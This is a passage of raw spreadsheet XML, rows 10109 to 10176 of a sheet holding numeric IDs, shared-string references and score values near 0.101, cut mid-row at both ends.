      <c r="C10109" s="2" t="s">
        <v>9668</v>
      </c>
      <c r="D10109" s="2">
        <v>1.0</v>
      </c>
      <c r="E10109" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10109" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10110" ht="15.75" customHeight="1">
      <c r="A10110" s="1">
        <v>30608.0</v>
      </c>
      <c r="B10110" s="2">
        <v>4.1347866E7</v>
      </c>
      <c r="C10110" s="2" t="s">
        <v>9669</v>
      </c>
      <c r="D10110" s="2">
        <v>1.0</v>
      </c>
      <c r="E10110" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10110" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="10111" ht="15.75" customHeight="1">
      <c r="A10111" s="1">
        <v>568.0</v>
      </c>
      <c r="B10111" s="2">
        <v>1.9070595E7</v>
      </c>
      <c r="C10111" s="2" t="s">
        <v>9670</v>
      </c>
      <c r="D10111" s="2">
        <v>1.0</v>
      </c>
      <c r="E10111" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10111" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10112" ht="15.75" customHeight="1">
      <c r="A10112" s="1">
        <v>1608.0</v>
      </c>
      <c r="B10112" s="2">
        <v>2.7819515E7</v>
      </c>
      <c r="C10112" s="2" t="s">
        <v>9671</v>
      </c>
      <c r="D10112" s="2">
        <v>1.0</v>
      </c>
      <c r="E10112" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10112" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10113" ht="15.75" customHeight="1">
      <c r="A10113" s="1">
        <v>1874.0</v>
      </c>
      <c r="B10113" s="2">
        <v>2.9663754E7</v>
      </c>
      <c r="C10113" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="D10113" s="2">
        <v>1.0</v>
      </c>
      <c r="E10113" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10113" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10114" ht="15.75" customHeight="1">
      <c r="A10114" s="1">
        <v>12023.0</v>
      </c>
      <c r="B10114" s="2">
        <v>2.6051383E7</v>
      </c>
      <c r="C10114" s="2" t="s">
        <v>9673</v>
      </c>
      <c r="D10114" s="2">
        <v>1.0</v>
      </c>
      <c r="E10114" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10114" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10115" ht="15.75" customHeight="1">
      <c r="A10115" s="1">
        <v>13173.0</v>
      </c>
      <c r="B10115" s="2">
        <v>3.4008232E7</v>
      </c>
      <c r="C10115" s="2" t="s">
        <v>9674</v>
      </c>
      <c r="D10115" s="2">
        <v>1.0</v>
      </c>
      <c r="E10115" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10115" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10116" ht="15.75" customHeight="1">
      <c r="A10116" s="1">
        <v>14943.0</v>
      </c>
      <c r="B10116" s="2">
        <v>4.1261965E7</v>
      </c>
      <c r="C10116" s="2" t="s">
        <v>9675</v>
      </c>
      <c r="D10116" s="2">
        <v>1.0</v>
      </c>
      <c r="E10116" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10116" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10117" ht="15.75" customHeight="1">
      <c r="A10117" s="1">
        <v>16432.0</v>
      </c>
      <c r="B10117" s="2">
        <v>4.6336403E7</v>
      </c>
      <c r="C10117" s="2" t="s">
        <v>9676</v>
      </c>
      <c r="D10117" s="2">
        <v>1.0</v>
      </c>
      <c r="E10117" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10117" s="2">
        <v>0.1014957264957265</v>
      </c>
    </row>
    <row r="10118" ht="15.75" customHeight="1">
      <c r="A10118" s="1">
        <v>10396.0</v>
      </c>
      <c r="B10118" s="2">
        <v>9165949.0</v>
      </c>
      <c r="C10118" s="2" t="s">
        <v>9677</v>
      </c>
      <c r="D10118" s="2">
        <v>1.0</v>
      </c>
      <c r="E10118" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10118" s="2">
        <v>0.1014957264957264</v>
      </c>
    </row>
    <row r="10119" ht="15.75" customHeight="1">
      <c r="A10119" s="1">
        <v>70.0</v>
      </c>
      <c r="B10119" s="2">
        <v>1.1662426E7</v>
      </c>
      <c r="C10119" s="2" t="s">
        <v>9678</v>
      </c>
      <c r="D10119" s="2">
        <v>1.0</v>
      </c>
      <c r="E10119" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10119" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10120" ht="15.75" customHeight="1">
      <c r="A10120" s="1">
        <v>79.0</v>
      </c>
      <c r="B10120" s="2">
        <v>1.1840335E7</v>
      </c>
      <c r="C10120" s="2" t="s">
        <v>9679</v>
      </c>
      <c r="D10120" s="2">
        <v>1.0</v>
      </c>
      <c r="E10120" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10120" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10121" ht="15.75" customHeight="1">
      <c r="A10121" s="1">
        <v>85.0</v>
      </c>
      <c r="B10121" s="2">
        <v>1.2017297E7</v>
      </c>
      <c r="C10121" s="2" t="s">
        <v>9680</v>
      </c>
      <c r="D10121" s="2">
        <v>1.0</v>
      </c>
      <c r="E10121" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10121" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10122" ht="15.75" customHeight="1">
      <c r="A10122" s="1">
        <v>114.0</v>
      </c>
      <c r="B10122" s="2">
        <v>1.2975575E7</v>
      </c>
      <c r="C10122" s="2" t="s">
        <v>9681</v>
      </c>
      <c r="D10122" s="2">
        <v>1.0</v>
      </c>
      <c r="E10122" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10122" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10123" ht="15.75" customHeight="1">
      <c r="A10123" s="1">
        <v>135.0</v>
      </c>
      <c r="B10123" s="2">
        <v>1.3361621E7</v>
      </c>
      <c r="C10123" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="D10123" s="2">
        <v>1.0</v>
      </c>
      <c r="E10123" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10123" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10124" ht="15.75" customHeight="1">
      <c r="A10124" s="1">
        <v>177.0</v>
      </c>
      <c r="B10124" s="2">
        <v>1.4102748E7</v>
      </c>
      <c r="C10124" s="2" t="s">
        <v>9683</v>
      </c>
      <c r="D10124" s="2">
        <v>1.0</v>
      </c>
      <c r="E10124" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10124" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10125" ht="15.75" customHeight="1">
      <c r="A10125" s="1">
        <v>226.0</v>
      </c>
      <c r="B10125" s="2">
        <v>1.4678552E7</v>
      </c>
      <c r="C10125" s="2" t="s">
        <v>9684</v>
      </c>
      <c r="D10125" s="2">
        <v>1.0</v>
      </c>
      <c r="E10125" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10125" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10126" ht="15.75" customHeight="1">
      <c r="A10126" s="1">
        <v>449.0</v>
      </c>
      <c r="B10126" s="2">
        <v>1.7158924E7</v>
      </c>
      <c r="C10126" s="2" t="s">
        <v>9685</v>
      </c>
      <c r="D10126" s="2">
        <v>1.0</v>
      </c>
      <c r="E10126" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10126" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10127" ht="15.75" customHeight="1">
      <c r="A10127" s="1">
        <v>471.0</v>
      </c>
      <c r="B10127" s="2">
        <v>1.7396781E7</v>
      </c>
      <c r="C10127" s="2" t="s">
        <v>9686</v>
      </c>
      <c r="D10127" s="2">
        <v>1.0</v>
      </c>
      <c r="E10127" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10127" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10128" ht="15.75" customHeight="1">
      <c r="A10128" s="1">
        <v>617.0</v>
      </c>
      <c r="B10128" s="2">
        <v>1.9483004E7</v>
      </c>
      <c r="C10128" s="2" t="s">
        <v>9687</v>
      </c>
      <c r="D10128" s="2">
        <v>1.0</v>
      </c>
      <c r="E10128" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10128" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10129" ht="15.75" customHeight="1">
      <c r="A10129" s="1">
        <v>962.0</v>
      </c>
      <c r="B10129" s="2">
        <v>2.2704166E7</v>
      </c>
      <c r="C10129" s="2" t="s">
        <v>9688</v>
      </c>
      <c r="D10129" s="2">
        <v>1.0</v>
      </c>
      <c r="E10129" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10129" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10130" ht="15.75" customHeight="1">
      <c r="A10130" s="1">
        <v>1066.0</v>
      </c>
      <c r="B10130" s="2">
        <v>2.352032E7</v>
      </c>
      <c r="C10130" s="2" t="s">
        <v>9689</v>
      </c>
      <c r="D10130" s="2">
        <v>1.0</v>
      </c>
      <c r="E10130" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10130" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10131" ht="15.75" customHeight="1">
      <c r="A10131" s="1">
        <v>1296.0</v>
      </c>
      <c r="B10131" s="2">
        <v>2.562811E7</v>
      </c>
      <c r="C10131" s="2" t="s">
        <v>9690</v>
      </c>
      <c r="D10131" s="2">
        <v>1.0</v>
      </c>
      <c r="E10131" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10131" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10132" ht="15.75" customHeight="1">
      <c r="A10132" s="1">
        <v>1497.0</v>
      </c>
      <c r="B10132" s="2">
        <v>2.722728E7</v>
      </c>
      <c r="C10132" s="2" t="s">
        <v>9691</v>
      </c>
      <c r="D10132" s="2">
        <v>1.0</v>
      </c>
      <c r="E10132" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10132" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10133" ht="15.75" customHeight="1">
      <c r="A10133" s="1">
        <v>1701.0</v>
      </c>
      <c r="B10133" s="2">
        <v>2.8531492E7</v>
      </c>
      <c r="C10133" s="2" t="s">
        <v>9692</v>
      </c>
      <c r="D10133" s="2">
        <v>1.0</v>
      </c>
      <c r="E10133" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10133" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10134" ht="15.75" customHeight="1">
      <c r="A10134" s="1">
        <v>1720.0</v>
      </c>
      <c r="B10134" s="2">
        <v>2.8646661E7</v>
      </c>
      <c r="C10134" s="2" t="s">
        <v>9693</v>
      </c>
      <c r="D10134" s="2">
        <v>1.0</v>
      </c>
      <c r="E10134" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10134" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10135" ht="15.75" customHeight="1">
      <c r="A10135" s="1">
        <v>1810.0</v>
      </c>
      <c r="B10135" s="2">
        <v>2.9211661E7</v>
      </c>
      <c r="C10135" s="2" t="s">
        <v>9694</v>
      </c>
      <c r="D10135" s="2">
        <v>1.0</v>
      </c>
      <c r="E10135" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10135" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10136" ht="15.75" customHeight="1">
      <c r="A10136" s="1">
        <v>2265.0</v>
      </c>
      <c r="B10136" s="2">
        <v>3.2431592E7</v>
      </c>
      <c r="C10136" s="2" t="s">
        <v>9695</v>
      </c>
      <c r="D10136" s="2">
        <v>1.0</v>
      </c>
      <c r="E10136" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10136" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10137" ht="15.75" customHeight="1">
      <c r="A10137" s="1">
        <v>2428.0</v>
      </c>
      <c r="B10137" s="2">
        <v>3.3588488E7</v>
      </c>
      <c r="C10137" s="2" t="s">
        <v>9696</v>
      </c>
      <c r="D10137" s="2">
        <v>1.0</v>
      </c>
      <c r="E10137" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10137" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10138" ht="15.75" customHeight="1">
      <c r="A10138" s="1">
        <v>2430.0</v>
      </c>
      <c r="B10138" s="2">
        <v>3.3601656E7</v>
      </c>
      <c r="C10138" s="2" t="s">
        <v>9697</v>
      </c>
      <c r="D10138" s="2">
        <v>1.0</v>
      </c>
      <c r="E10138" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10138" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10139" ht="15.75" customHeight="1">
      <c r="A10139" s="1">
        <v>2536.0</v>
      </c>
      <c r="B10139" s="2">
        <v>3.4098873E7</v>
      </c>
      <c r="C10139" s="2" t="s">
        <v>9698</v>
      </c>
      <c r="D10139" s="2">
        <v>1.0</v>
      </c>
      <c r="E10139" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10139" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10140" ht="15.75" customHeight="1">
      <c r="A10140" s="1">
        <v>2543.0</v>
      </c>
      <c r="B10140" s="2">
        <v>3.4117531E7</v>
      </c>
      <c r="C10140" s="2" t="s">
        <v>9699</v>
      </c>
      <c r="D10140" s="2">
        <v>1.0</v>
      </c>
      <c r="E10140" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10140" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10141" ht="15.75" customHeight="1">
      <c r="A10141" s="1">
        <v>2563.0</v>
      </c>
      <c r="B10141" s="2">
        <v>3.4239189E7</v>
      </c>
      <c r="C10141" s="2" t="s">
        <v>9700</v>
      </c>
      <c r="D10141" s="2">
        <v>1.0</v>
      </c>
      <c r="E10141" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10141" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10142" ht="15.75" customHeight="1">
      <c r="A10142" s="1">
        <v>2568.0</v>
      </c>
      <c r="B10142" s="2">
        <v>3.4243734E7</v>
      </c>
      <c r="C10142" s="2" t="s">
        <v>9701</v>
      </c>
      <c r="D10142" s="2">
        <v>1.0</v>
      </c>
      <c r="E10142" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10142" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10143" ht="15.75" customHeight="1">
      <c r="A10143" s="1">
        <v>2733.0</v>
      </c>
      <c r="B10143" s="2">
        <v>3.4990131E7</v>
      </c>
      <c r="C10143" s="2" t="s">
        <v>9702</v>
      </c>
      <c r="D10143" s="2">
        <v>1.0</v>
      </c>
      <c r="E10143" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10143" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10144" ht="15.75" customHeight="1">
      <c r="A10144" s="1">
        <v>2756.0</v>
      </c>
      <c r="B10144" s="2">
        <v>3.5100614E7</v>
      </c>
      <c r="C10144" s="2" t="s">
        <v>9703</v>
      </c>
      <c r="D10144" s="2">
        <v>1.0</v>
      </c>
      <c r="E10144" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10144" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10145" ht="15.75" customHeight="1">
      <c r="A10145" s="1">
        <v>2844.0</v>
      </c>
      <c r="B10145" s="2">
        <v>3.5461605E7</v>
      </c>
      <c r="C10145" s="2" t="s">
        <v>9704</v>
      </c>
      <c r="D10145" s="2">
        <v>1.0</v>
      </c>
      <c r="E10145" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10145" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10146" ht="15.75" customHeight="1">
      <c r="A10146" s="1">
        <v>2869.0</v>
      </c>
      <c r="B10146" s="2">
        <v>3.5569432E7</v>
      </c>
      <c r="C10146" s="2" t="s">
        <v>9705</v>
      </c>
      <c r="D10146" s="2">
        <v>1.0</v>
      </c>
      <c r="E10146" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10146" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10147" ht="15.75" customHeight="1">
      <c r="A10147" s="1">
        <v>2870.0</v>
      </c>
      <c r="B10147" s="2">
        <v>3.5569432E7</v>
      </c>
      <c r="C10147" s="2" t="s">
        <v>9706</v>
      </c>
      <c r="D10147" s="2">
        <v>1.0</v>
      </c>
      <c r="E10147" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10147" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10148" ht="15.75" customHeight="1">
      <c r="A10148" s="1">
        <v>2903.0</v>
      </c>
      <c r="B10148" s="2">
        <v>3.5764596E7</v>
      </c>
      <c r="C10148" s="2" t="s">
        <v>9707</v>
      </c>
      <c r="D10148" s="2">
        <v>1.0</v>
      </c>
      <c r="E10148" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10148" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10149" ht="15.75" customHeight="1">
      <c r="A10149" s="1">
        <v>3039.0</v>
      </c>
      <c r="B10149" s="2">
        <v>3.648619E7</v>
      </c>
      <c r="C10149" s="2" t="s">
        <v>9708</v>
      </c>
      <c r="D10149" s="2">
        <v>1.0</v>
      </c>
      <c r="E10149" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10149" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10150" ht="15.75" customHeight="1">
      <c r="A10150" s="1">
        <v>3060.0</v>
      </c>
      <c r="B10150" s="2">
        <v>3.6509694E7</v>
      </c>
      <c r="C10150" s="2" t="s">
        <v>9709</v>
      </c>
      <c r="D10150" s="2">
        <v>1.0</v>
      </c>
      <c r="E10150" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10150" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10151" ht="15.75" customHeight="1">
      <c r="A10151" s="1">
        <v>3280.0</v>
      </c>
      <c r="B10151" s="2">
        <v>3.7486607E7</v>
      </c>
      <c r="C10151" s="2" t="s">
        <v>9710</v>
      </c>
      <c r="D10151" s="2">
        <v>1.0</v>
      </c>
      <c r="E10151" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10151" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10152" ht="15.75" customHeight="1">
      <c r="A10152" s="1">
        <v>3570.0</v>
      </c>
      <c r="B10152" s="2">
        <v>3.8946201E7</v>
      </c>
      <c r="C10152" s="2" t="s">
        <v>9711</v>
      </c>
      <c r="D10152" s="2">
        <v>1.0</v>
      </c>
      <c r="E10152" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10152" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10153" ht="15.75" customHeight="1">
      <c r="A10153" s="1">
        <v>3612.0</v>
      </c>
      <c r="B10153" s="2">
        <v>3.9142042E7</v>
      </c>
      <c r="C10153" s="2" t="s">
        <v>9712</v>
      </c>
      <c r="D10153" s="2">
        <v>1.0</v>
      </c>
      <c r="E10153" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10153" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10154" ht="15.75" customHeight="1">
      <c r="A10154" s="1">
        <v>3634.0</v>
      </c>
      <c r="B10154" s="2">
        <v>3.9258593E7</v>
      </c>
      <c r="C10154" s="2" t="s">
        <v>9713</v>
      </c>
      <c r="D10154" s="2">
        <v>1.0</v>
      </c>
      <c r="E10154" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10154" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10155" ht="15.75" customHeight="1">
      <c r="A10155" s="1">
        <v>3703.0</v>
      </c>
      <c r="B10155" s="2">
        <v>3.958042E7</v>
      </c>
      <c r="C10155" s="2" t="s">
        <v>9714</v>
      </c>
      <c r="D10155" s="2">
        <v>1.0</v>
      </c>
      <c r="E10155" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10155" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10156" ht="15.75" customHeight="1">
      <c r="A10156" s="1">
        <v>3774.0</v>
      </c>
      <c r="B10156" s="2">
        <v>3.9861478E7</v>
      </c>
      <c r="C10156" s="2" t="s">
        <v>9715</v>
      </c>
      <c r="D10156" s="2">
        <v>1.0</v>
      </c>
      <c r="E10156" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10156" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10157" ht="15.75" customHeight="1">
      <c r="A10157" s="1">
        <v>3858.0</v>
      </c>
      <c r="B10157" s="2">
        <v>4.0301345E7</v>
      </c>
      <c r="C10157" s="2" t="s">
        <v>9716</v>
      </c>
      <c r="D10157" s="2">
        <v>1.0</v>
      </c>
      <c r="E10157" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10157" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10158" ht="15.75" customHeight="1">
      <c r="A10158" s="1">
        <v>3888.0</v>
      </c>
      <c r="B10158" s="2">
        <v>4.0391672E7</v>
      </c>
      <c r="C10158" s="2" t="s">
        <v>9717</v>
      </c>
      <c r="D10158" s="2">
        <v>1.0</v>
      </c>
      <c r="E10158" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10158" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10159" ht="15.75" customHeight="1">
      <c r="A10159" s="1">
        <v>3892.0</v>
      </c>
      <c r="B10159" s="2">
        <v>4.0404154E7</v>
      </c>
      <c r="C10159" s="2" t="s">
        <v>9718</v>
      </c>
      <c r="D10159" s="2">
        <v>1.0</v>
      </c>
      <c r="E10159" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10159" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10160" ht="15.75" customHeight="1">
      <c r="A10160" s="1">
        <v>4219.0</v>
      </c>
      <c r="B10160" s="2">
        <v>4.1720713E7</v>
      </c>
      <c r="C10160" s="2" t="s">
        <v>9719</v>
      </c>
      <c r="D10160" s="2">
        <v>1.0</v>
      </c>
      <c r="E10160" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10160" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10161" ht="15.75" customHeight="1">
      <c r="A10161" s="1">
        <v>4244.0</v>
      </c>
      <c r="B10161" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C10161" s="2" t="s">
        <v>9720</v>
      </c>
      <c r="D10161" s="2">
        <v>1.0</v>
      </c>
      <c r="E10161" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10161" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10162" ht="15.75" customHeight="1">
      <c r="A10162" s="1">
        <v>4488.0</v>
      </c>
      <c r="B10162" s="2">
        <v>4.2518731E7</v>
      </c>
      <c r="C10162" s="2" t="s">
        <v>9721</v>
      </c>
      <c r="D10162" s="2">
        <v>1.0</v>
      </c>
      <c r="E10162" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10162" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10163" ht="15.75" customHeight="1">
      <c r="A10163" s="1">
        <v>4599.0</v>
      </c>
      <c r="B10163" s="2">
        <v>4.2810653E7</v>
      </c>
      <c r="C10163" s="2" t="s">
        <v>9722</v>
      </c>
      <c r="D10163" s="2">
        <v>1.0</v>
      </c>
      <c r="E10163" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10163" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10164" ht="15.75" customHeight="1">
      <c r="A10164" s="1">
        <v>4606.0</v>
      </c>
      <c r="B10164" s="2">
        <v>4.2865826E7</v>
      </c>
      <c r="C10164" s="2" t="s">
        <v>9723</v>
      </c>
      <c r="D10164" s="2">
        <v>1.0</v>
      </c>
      <c r="E10164" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10164" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10165" ht="15.75" customHeight="1">
      <c r="A10165" s="1">
        <v>4921.0</v>
      </c>
      <c r="B10165" s="2">
        <v>4.3961223E7</v>
      </c>
      <c r="C10165" s="2" t="s">
        <v>9724</v>
      </c>
      <c r="D10165" s="2">
        <v>1.0</v>
      </c>
      <c r="E10165" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10165" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10166" ht="15.75" customHeight="1">
      <c r="A10166" s="1">
        <v>4969.0</v>
      </c>
      <c r="B10166" s="2">
        <v>4.4096481E7</v>
      </c>
      <c r="C10166" s="2" t="s">
        <v>9725</v>
      </c>
      <c r="D10166" s="2">
        <v>1.0</v>
      </c>
      <c r="E10166" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10166" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10167" ht="15.75" customHeight="1">
      <c r="A10167" s="1">
        <v>5235.0</v>
      </c>
      <c r="B10167" s="2">
        <v>4.5017746E7</v>
      </c>
      <c r="C10167" s="2" t="s">
        <v>9726</v>
      </c>
      <c r="D10167" s="2">
        <v>1.0</v>
      </c>
      <c r="E10167" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10167" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10168" ht="15.75" customHeight="1">
      <c r="A10168" s="1">
        <v>5349.0</v>
      </c>
      <c r="B10168" s="2">
        <v>4.5348473E7</v>
      </c>
      <c r="C10168" s="2" t="s">
        <v>9727</v>
      </c>
      <c r="D10168" s="2">
        <v>1.0</v>
      </c>
      <c r="E10168" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10168" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10169" ht="15.75" customHeight="1">
      <c r="A10169" s="1">
        <v>5357.0</v>
      </c>
      <c r="B10169" s="2">
        <v>4.5370622E7</v>
      </c>
      <c r="C10169" s="2" t="s">
        <v>9728</v>
      </c>
      <c r="D10169" s="2">
        <v>1.0</v>
      </c>
      <c r="E10169" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10169" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10170" ht="15.75" customHeight="1">
      <c r="A10170" s="1">
        <v>5370.0</v>
      </c>
      <c r="B10170" s="2">
        <v>4.5381227E7</v>
      </c>
      <c r="C10170" s="2" t="s">
        <v>9729</v>
      </c>
      <c r="D10170" s="2">
        <v>1.0</v>
      </c>
      <c r="E10170" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10170" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10171" ht="15.75" customHeight="1">
      <c r="A10171" s="1">
        <v>5388.0</v>
      </c>
      <c r="B10171" s="2">
        <v>4.5441623E7</v>
      </c>
      <c r="C10171" s="2" t="s">
        <v>9730</v>
      </c>
      <c r="D10171" s="2">
        <v>1.0</v>
      </c>
      <c r="E10171" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10171" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10172" ht="15.75" customHeight="1">
      <c r="A10172" s="1">
        <v>5394.0</v>
      </c>
      <c r="B10172" s="2">
        <v>4.5459857E7</v>
      </c>
      <c r="C10172" s="2" t="s">
        <v>9731</v>
      </c>
      <c r="D10172" s="2">
        <v>1.0</v>
      </c>
      <c r="E10172" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10172" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10173" ht="15.75" customHeight="1">
      <c r="A10173" s="1">
        <v>5712.0</v>
      </c>
      <c r="B10173" s="2">
        <v>4.6553483E7</v>
      </c>
      <c r="C10173" s="2" t="s">
        <v>9732</v>
      </c>
      <c r="D10173" s="2">
        <v>1.0</v>
      </c>
      <c r="E10173" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10173" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10174" ht="15.75" customHeight="1">
      <c r="A10174" s="1">
        <v>5751.0</v>
      </c>
      <c r="B10174" s="2">
        <v>4.6648838E7</v>
      </c>
      <c r="C10174" s="2" t="s">
        <v>9733</v>
      </c>
      <c r="D10174" s="2">
        <v>1.0</v>
      </c>
      <c r="E10174" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10174" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10175" ht="15.75" customHeight="1">
      <c r="A10175" s="1">
        <v>5772.0</v>
      </c>
      <c r="B10175" s="2">
        <v>4.6708595E7</v>
      </c>
      <c r="C10175" s="2" t="s">
        <v>9734</v>
      </c>
      <c r="D10175" s="2">
        <v>1.0</v>
      </c>
      <c r="E10175" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F10175" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="10176" ht="15.75" customHeight="1">
      <c r="A10176" s="1">
        <v>6164.0</v>
      </c>
      <c r="B10176" s="2">
        <v>4.7873551E7</v>
      </c>
